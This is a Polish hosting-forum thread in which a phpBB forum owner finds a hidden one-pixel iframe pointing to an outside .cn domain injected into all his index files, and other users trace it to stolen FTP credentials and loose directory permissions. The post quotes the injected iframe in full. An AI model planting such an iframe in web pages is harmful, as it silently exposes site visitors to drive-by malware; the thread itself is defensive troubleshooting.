Dziwny kod w plikach

[WPNJ 0]

Witam.

Mam dość dziwny problem. Posiadam forum na skrypcie phpbb3. Dzisiaj wchodząc na forum wyskoczył error, że w index.php coś się zepsuło. Wszedłem do pliku, znalazłem odpowiednią linijkę w kodzie i co widzę?

<html><body><iframe src="http://MediaHouseNameBuyPicture.cn/in/" width=1 height=1 style="visibility: hidden"></iframe></body></html>

 

Co najgorsze ten sam kod był w każdym pliku index.php czy index.html. Nie mam pojęcia co to jest. Jak wszedłem na tą stronę to się nic nie pojawiło, tylko Firefox się zawiesił. Może to jakiś złośliwy skrypt??? Wirus?? Skąd coś takiego mogło się wziąć we wszystkich plikach index??? Może ma ktoś jakieś pomysły co do tego.

[patryk 451]

Jeśli masz jakieś skrypty uploadu na forum to sprawdź czy nie mają dziury bo zapewne ktoś Ci to zainsertował przez nią właśnie. Analiza logów też pomoże . Sam skrypt to zapewne najzwyklejsze spyware.

[p 3]

Jak wszedłem na tą stronę to się nic nie pojawiło, tylko Firefox się zawiesił. Może to jakiś złośliwy skrypt??? Wirus??

Tak.

 

Skąd coś takiego mogło się wziąć we wszystkich plikach index??? Może ma ktoś jakieś pomysły co do tego.

Pewnie z Ukrainy.

[WPNJ 0]

Czy usunięcie tego kodu z plików "zamknęło" sprawę czy nadal coś może być nie tak. Jak się pozbyć tego raz na zawsze?

 

patryk nie mam żadnych skryptów uploadu.

[p 3]

Czy usunięcie tego kodu z plików "zamknęło" sprawę czy nadal coś może być nie tak.

Niczego nie zamknęło. Sprawa jest nadal 'otwarta'.

 

Jak się pozbyć tego raz na zawsze?

Zabezpiecz serwer.

[WPNJ 0]

To wina skryptu forum czy serwera??? Chyba nie mam wpływu na zabezpieczenie serwera neteasy.

[patryk 451]

Ano tak, w dodatku jeszcze masz konto u mnie. To śpiesze wyjaśnić, że gdyby to była wina serwera to każda strona na maszynie, na której jest Twoje konto miałaby ten problem. Przejrzenie logów i sprawdzenie czy ktoś Ci czegoś nie zainsertował ne boli, naprawdę (podobnie jak napisanie do biura obslugi).

 

ps. (po zajrzeniu na konto): na to żeby nie ustawiać drwxrwxrwx na katalogi masz z pewnością wpływ .

[WPNJ 0]

No tak. A czego szukać w logach? Bo jak przejrzałem logi z Apache to naprawdę niczego dziwnego nie znalazłem.

[patryk 451]

Przeczytaj moje postscriptum..

[WPNJ 0]

A mógłbyś jaśniej powiedzieć co to jest??? Bo naprawdę aż taki mądry w tych tematach nie jestem

[patryk 451]

Prawa dostępu do katalogu, jeśli ustawiasz sobie na katalogi prawa "777" to nie dziw sie, że każdy może wykorzystać najmniejsza dziurę w Twoim serwisie i wrzucić jakiś skrypt na Twoje konto. Jeśli masz więcej pytań pisz do BOKu, bo nie będe tutaj listował Twojego katalogu domowego .

[WPNJ 0]

Skorzystam z BOKu

[exa 0]

Ostatnio czytałem o podobnych problemach i okazało się, że istnieje wirus/robak, który po instalacji w systemie windows wyszukuje zapisanych haseł na serwery FTP (np. z total commandera), loguje się i dokleja złośliwy kod do plików index. Radziłbym zmienić hasła do FTP i nie korzystać z opcji pamiętania haseł.

[Noone 19]

To TC tak miał. Na przyszłość zadbaj o zabezpieczenie własnego komputera. I zmień klienta ftp (np. na fireftp).

[Tomasz Fiedoruk 98]

Tym bardziej, że ostatnio pozwali kogoś za używanie TC (TC jest na licencji shareware i należy go odinstalować po 30 dniach użytkowania)

[Hekko.pl 239]

Tym bardziej, że ostatnio pozwali kogoś za używanie TC (TC jest na licencji shareware i należy go odinstalować po 30 dniach użytkowania)

 

Albo wykupić licencję no przecież to nie jest fortuna

[xorg 693]

Po co używać TC do FTP jak wiele lepszych programów freeware od niego, np. FileZilla

[p 3]

Po co używać TC do FTP jak wiele lepszych programów freeware od niego, np. FileZilla

Po co używać osobnego programu?

[WPNJ 0]

Witam.

Już wiem skąd ta cała afera. Wszystko przez Total Commandera. Miałem w nim zapisane parę danych do kont ftp. I na wszystkich jest to samo. To musiał być jakiś wirus tak jak mówił exa. Strzeżcie się.

 

P.S. Jakiego klienta FTP używać?

[xorg 693]

FileZilla.